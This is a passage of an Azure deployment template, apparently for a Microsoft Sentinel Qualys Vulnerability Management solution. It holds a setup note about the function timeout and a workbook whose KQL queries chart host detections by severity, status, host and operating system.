+ { + "description": "**4. Configure the host.json**.\n\nDue to the potentially large amount of Qualys host detection data being ingested, it can cause the execution time to surpass the default Function App timeout of five (5) minutes. Increase the default timeout duration to the maximum of ten (10) minutes, under the Consumption Plan, to allow more time for the Function App to execute.\n\n1. In the Function App, select the Function App Name and select the **App Service Editor** blade.\n2. Click **Go** to open the editor, then select the **host.json** file under the **wwwroot** directory.\n3. Add the line `\"functionTimeout\": \"00:10:00\",` above the `managedDependancy` line \n4. Ensure **SAVED** appears on the top right corner of the editor, then exit the editor.\n\n> NOTE: If a longer timeout duration is required, consider upgrading to an [App Service Plan](https://docs.microsoft.com/azure/azure-functions/functions-scale#timeout)" + } + ], + "id": "[variables('_uiConfigId1')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('workbookTemplateSpecName1')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVMv2 Workbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('workbookVersion1')]", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.Insights/workbooks", + "name": "[variables('workbookContentId1')]", + "location": "[parameters('workspace-location')]", + "kind": "shared", + "apiVersion": "2021-08-01", + "metadata": { + "description": "Gain insight into Qualys Vulnerability Management by analyzing, collecting and correlating vulnerability data.\nThis workbook provides visibility into vulnerabilities detected from vulnerability scans" + }, + "properties": { + "displayName": "[parameters('workbook1-name')]", + "serializedData": "{\"version\":\"Notebook/1.0\",\"items\":[{\"type\":9,\"content\":{\"version\":\"KqlParameterItem/1.0\",\"parameters\":[{\"id\":\"1694c013-fbeb-43eb-89c7-1417bb59150f\",\"version\":\"KqlParameterItem/1.0\",\"name\":\"TimeRange\",\"label\":\"Time Range\",\"type\":4,\"value\":{\"durationMs\":2419200000},\"typeSettings\":{\"selectableValues\":[{\"durationMs\":300000},{\"durationMs\":900000},{\"durationMs\":1800000},{\"durationMs\":3600000},{\"durationMs\":14400000},{\"durationMs\":43200000},{\"durationMs\":86400000},{\"durationMs\":172800000},{\"durationMs\":259200000},{\"durationMs\":604800000},{\"durationMs\":1209600000},{\"durationMs\":2419200000},{\"durationMs\":2592000000},{\"durationMs\":5184000000},{\"durationMs\":7776000000}],\"allowCustom\":true},\"resourceType\":\"microsoft.insights/components\"},{\"id\":\"a9cc502e-223d-4067-834b-a34a85055664\",\"version\":\"KqlParameterItem/1.0\",\"name\":\"severitySelector\",\"label\":\"Severity\",\"type\":2,\"isRequired\":true,\"multiSelect\":true,\"quote\":\"'\",\"delimiter\":\",\",\"query\":\"QualysHostDetectionV2_CL\\r\\n| extend Sev = tostring(Severity_s)\\r\\n| distinct Sev\\r\\n| sort by Sev desc\",\"value\":[\"value::all\"],\"typeSettings\":{\"additionalResourceOptions\":[\"value::all\"]},\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"},{\"id\":\"364f8236-9b9d-4e41-9767-ab5f404dcd4e\",\"version\":\"KqlParameterItem/1.0\",\"name\":\"OperatingSystem\",\"label\":\"Operating System\",\"type\":2,\"isRequired\":true,\"multiSelect\":true,\"quote\":\"'\",\"delimiter\":\",\",\"query\":\"QualysHostDetectionV2_CL\\r\\n| distinct OperatingSystem_s\",\"value\":[\"value::all\"],\"typeSettings\":{\"additionalResourceOptions\":[\"value::all\"]},\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"}],\"style\":\"above\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"},\"name\":\"parameters - 2\"},{\"type\":11,\"content\":{\"version\":\"LinkItem/1.0\",\"style\":\"tabs\",\"links\":[{\"cellValue\":\"selectedTab\",\"linkTarget\":\"parameter\",\"linkLabel\":\"Scan Detection\",\"subTarget\":\"Detection\",\"preText\":\"ScanDetectio\",\"style\":\"link\"},{\"cellValue\":\"selectedTab\",\"linkTarget\":\"parameter\",\"linkLabel\":\"Vulnerability Analysis\",\"subTarget\":\"VulnerabilityAnalysis\",\"style\":\"link\"}]},\"name\":\"links - 5\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| where isnotempty(Sev)\\n| summarize ['5 - Urgent'] = countif(Sev == \\\"5\\\"), ['4 - Critical'] = countif(Sev == \\\"4\\\"), ['3 - Serious'] = countif(Sev == \\\"3\\\"), ['2 - Medium'] = countif(Sev == \\\"2\\\"), ['1 - Minimal'] = countif(Sev == \\\"1\\\"), count() by bin(TimeGenerated, {TimeRange:grain})\\n| project-away count_\\n\\n\",\"size\":0,\"title\":\"Detections by Severity Timeline\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"barchart\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - Minimal\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2},\"chartSettings\":{\"seriesLabelSettings\":[{\"seriesName\":\"5 - Urgent\",\"color\":\"redBright\"},{\"seriesName\":\"4 - Critical\",\"color\":\"redDark\"},{\"seriesName\":\"3 - Serious\",\"color\":\"orange\"},{\"seriesName\":\"2 - Medium\",\"color\":\"magenta\"},{\"seriesName\":\"1 - Minimal\",\"color\":\"lightBlue\"}]}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"name\":\"query - 2 \"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Status = tostring(Status_s)\\n| summarize count() by Status\\n\\n\",\"size\":0,\"title\":\"Detection Status\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"piechart\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - Minimal\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2},\"chartSettings\":{\"seriesLabelSettings\":[{\"seriesName\":\"5 - Urgent\",\"color\":\"redBright\"},{\"seriesName\":\"4 - Critical\",\"color\":\"redDark\"},{\"seriesName\":\"3 - Serious\",\"color\":\"orange\"},{\"seriesName\":\"2 - Medium\",\"color\":\"magenta\"},{\"seriesName\":\"1 - Minimal\",\"color\":\"lightBlue\"}]}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == \\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| extend Status = tostring(Status_s)\\n| where Status == \\\"Re-Opened\\\"\\n| summarize count() by Sev, Severity, Vulnerability ;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nlet topSerious = data\\n| where Sev == \\\"3\\\"\\n| top 10 by count_;\\nlet topMedium = data\\n| where Sev == \\\"2\\\"\\n| top 10 by count_;\\nlet topMinimal = data\\n| where Sev == \\\"1\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical, topSerious, topMedium, topMinimal\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Re-Opened Vulnerabilities by Severity\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == \\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| extend Status = tostring(Status_s)\\n| where Status == \\\"New\\\" and Sev in (\\\"5\\\", \\\"4\\\")\\n| summarize count() by Sev, Severity, IPAddress, DnsName_s;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Host with New Urgent/Critical Vulnerabilities\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == \\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| extend Status = tostring(Status_s)\\n| where Status == \\\"Re-Opened\\\" and Sev in (\\\"5\\\", \\\"4\\\")\\n| summarize count() by Sev, Severity, IPAddress, DnsName_s;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Host with Re-Opened Urgent/Critical Vulnerabilities\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy - Copy - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where isnotempty(Sev)\\n| summarize ['5 - Urgent'] = countif(Sev == \\\"5\\\"), ['4 - Critical'] = countif(Sev == \\\"4\\\"), ['3 - Serious'] = countif(Sev == \\\"3\\\"), ['2 - Medium'] = countif(Sev == \\\"2\\\"), ['1 - Minimal'] = countif(Sev == \\\"1\\\"), count() by OperatingSystem_s\\n| project-rename Total = count_\\n| sort by Total desc \\n| top 10 by Total\\n\\n\",\"size\":0,\"title\":\"Top Total Detections by Operation System\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"OperatingSystem_s\",\"label\":\"Operating System\"},{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - Minimal\"},{\"columnId\":\"Total\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"name\":\"query - 2 - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == \\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| summarize count() by Sev, Severity, Vulnerability ;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nlet topSerious = data\\n| where Sev == \\\"3\\\"\\n| top 10 by count_;\\nlet topMedium = data\\n| where Sev == \\\"2\\\"\\n| top 10 by count_;\\nlet topMinimal = data\\n| where Sev == \\\"1\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical, topSerious, topMedium, topMinimal\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Vulnerabilities Detected per Severity\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == \\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| summarize count() by Sev, Severity, IPAddress, DnsName_s;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nlet topSerious = data\\n| where Sev == \\\"3\\\"\\n| top 10 by count_;\\nlet topMedium = data\\n| where Sev == \\\"2\\\"\\n| top 10 by count_;\\nlet topMinimal = data\\n| where Sev == \\\"1\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical, topSerious, topMedium, topMinimal\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Detections by Host per Severity\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy\"},{\"type\":9,\"content\":{\"version\":\"KqlParameterItem/1.0\",\"parameters\":[{\"id\":\"d7f3f8af-5b1a-46b1-8fe6-a0440175704a\",\"version\":\"KqlParameterItem/1.0\",\"name\":\"Vuln\",\"label\":\"Vulnerability 